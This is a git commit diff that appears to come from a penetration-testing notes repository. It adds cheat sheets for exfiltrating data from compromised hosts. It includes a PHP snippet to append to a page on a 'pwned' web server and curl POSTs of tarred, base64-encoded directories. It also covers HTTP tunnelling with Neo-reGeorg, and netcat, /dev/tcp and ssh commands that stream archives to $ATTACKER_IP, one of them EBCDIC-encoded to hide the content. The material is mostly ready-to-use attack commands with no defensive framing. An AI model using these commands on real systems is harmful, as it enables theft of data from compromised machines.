added http to exfiltration
This commit is contained in:
		
							parent
							
								
									cf50085db3
								
							
						
					
					
						commit
						851ed5ef3b
					
				| 
						 | 
					@ -0,0 +1,47 @@
 | 
				
			||||||
 | 
					# HTTP/PHP Exfiltration
 | 
				
			||||||
 | 
					
 | 
				
			||||||
 | 
					* On a pwned web server concat the following PHP code to an existing page
 | 
				
			||||||
 | 
					```php
 | 
				
			||||||
 | 
					<?php 
 | 
				
			||||||
 | 
					if (isset($_POST['file'])) {
 | 
				
			||||||
 | 
					        $file = fopen("/tmp/out.b64","w");
 | 
				
			||||||
 | 
					        fwrite($file, $_POST['file']);
 | 
				
			||||||
 | 
					        fclose($file);
 | 
				
			||||||
 | 
					   }
 | 
				
			||||||
 | 
					?>
 | 
				
			||||||
 | 
					```
 | 
				
			||||||
 | 
					
 | 
				
			||||||
 | 
					* POST the payload to the controlled web server
 | 
				
			||||||
 | 
					```sh
 | 
				
			||||||
 | 
					curl --data "file=$(tar zcf - <directory> | base64)" http://example.com/about.php
 | 
				
			||||||
 | 
					```
 | 
				
			||||||
 | 
					
 | 
				
			||||||
 | 
					* Prepare the stored file through removing the url encoding
 | 
				
			||||||
 | 
					```sh
 | 
				
			||||||
 | 
					sudo sed -i 's/ /+/g' /tmp/out.b64
 | 
				
			||||||
 | 
					```
 | 
				
			||||||
 | 
					
 | 
				
			||||||
 | 
					* Unarchive the data
 | 
				
			||||||
 | 
					```sh
 | 
				
			||||||
 | 
					cat /tmp/out.b64 | base64 -d | tar xvfz -
 | 
				
			||||||
 | 
					```
 | 
				
			||||||
 | 
					
 | 
				
			||||||
 | 
					## Pivot via Tunneling over HTTP
 | 
				
			||||||
 | 
					
 | 
				
			||||||
 | 
					* [Neo-reGeorg's tool](https://github.com/L-codes/Neo-reGeorg)
 | 
				
			||||||
 | 
					
 | 
				
			||||||
 | 
					* Generate an encrypted client with a key via
 | 
				
			||||||
 | 
					```sh
 | 
				
			||||||
 | 
					python3 neoreg.py generate -k key.enc
 | 
				
			||||||
 | 
					```
 | 
				
			||||||
 | 
					
 | 
				
			||||||
 | 
					* Upload `tunnel.php` to the web server created
 | 
				
			||||||
 | 
					* Trigger the tunnel via
 | 
				
			||||||
 | 
					```sh
 | 
				
			||||||
 | 
					python3 neoreg.py -k key.enc -u http://example.com/tunnel.php
 | 
				
			||||||
 | 
					```
 | 
				
			||||||
 | 
					
 | 
				
			||||||
 | 
					* Start socks5 via
 | 
				
			||||||
 | 
					```sh
 | 
				
			||||||
 | 
					curl --socks5 127.0.0.1:1080 http://target.example.com
 | 
				
			||||||
 | 
					```
 | 
				
			||||||
| 
						 | 
					@ -1,11 +1,35 @@
 | 
				
			||||||
# Netcat
 | 
					# Netcat
 | 
				
			||||||
 | 
					
 | 
				
			||||||
 | 
					## Receiver
 | 
				
			||||||
 | 
					
 | 
				
			||||||
* RX
 | 
					* RX
 | 
				
			||||||
```sh
 | 
					```sh
 | 
				
			||||||
nc -lp 8080 > out.txt
 | 
					nc -lp 8080 > out.txt
 | 
				
			||||||
```
 | 
					```
 | 
				
			||||||
 | 
					
 | 
				
			||||||
 | 
					## Transceiver
 | 
				
			||||||
 | 
					
 | 
				
			||||||
* TX
 | 
					* TX
 | 
				
			||||||
```sh
 | 
					```sh
 | 
				
			||||||
nc $ATTACKER_IP 8080 < in.txt
 | 
					nc $ATTACKER_IP 8080 < in.txt
 | 
				
			||||||
```
 | 
					```
 | 
				
			||||||
 | 
					
 | 
				
			||||||
 | 
					* TX without nc
 | 
				
			||||||
 | 
					```sh
 | 
				
			||||||
 | 
					cat <file> > /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT
 | 
				
			||||||
 | 
					```
 | 
				
			||||||
 | 
					
 | 
				
			||||||
* Have to be end manually after a while
 | 
					* Have to be end manually after a while
 | 
				
			||||||
 | 
					
 | 
				
			||||||
 | 
					## Compress and Encode
 | 
				
			||||||
 | 
					
 | 
				
			||||||
 | 
					* Compress and encode the transmitted data
 | 
				
			||||||
 | 
					```sh
 | 
				
			||||||
 | 
					tar cfz - <directory> | base64 | dd conv=ebcdic > /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT
 | 
				
			||||||
 | 
					```
 | 
				
			||||||
 | 
					
 | 
				
			||||||
 | 
					* On receiver's side, after `out.data` has been received
 | 
				
			||||||
 | 
					```sh
 | 
				
			||||||
 | 
					dd conv=ascii if=out.data | base64 -d > out.tar
 | 
				
			||||||
 | 
					tar xvf out.tar
 | 
				
			||||||
 | 
					```
 | 
				
			||||||
| 
						 | 
					
 | 
				
			||||||
| 
						 | 
					@ -0,0 +1,11 @@
 | 
				
			||||||
 | 
					# SSH Exfiltration
 | 
				
			||||||
 | 
					
 | 
				
			||||||
 | 
					* Given: without `scp`
 | 
				
			||||||
 | 
					
 | 
				
			||||||
 | 
					## Compress
 | 
				
			||||||
 | 
					
 | 
				
			||||||
 | 
					* Archive the data on target, send it to the attacker. Unpack including preserved permissions
 | 
				
			||||||
 | 
					```sh
 | 
				
			||||||
 | 
					tar cf - <directory> | ssh user@$ATTACKER_IP "cd /tmp/; tar xpf -"
 | 
				
			||||||
 | 
					```
 | 
				
			||||||
 | 
					
 | 
				
			||||||
		Loading…
	
		Reference in New Issue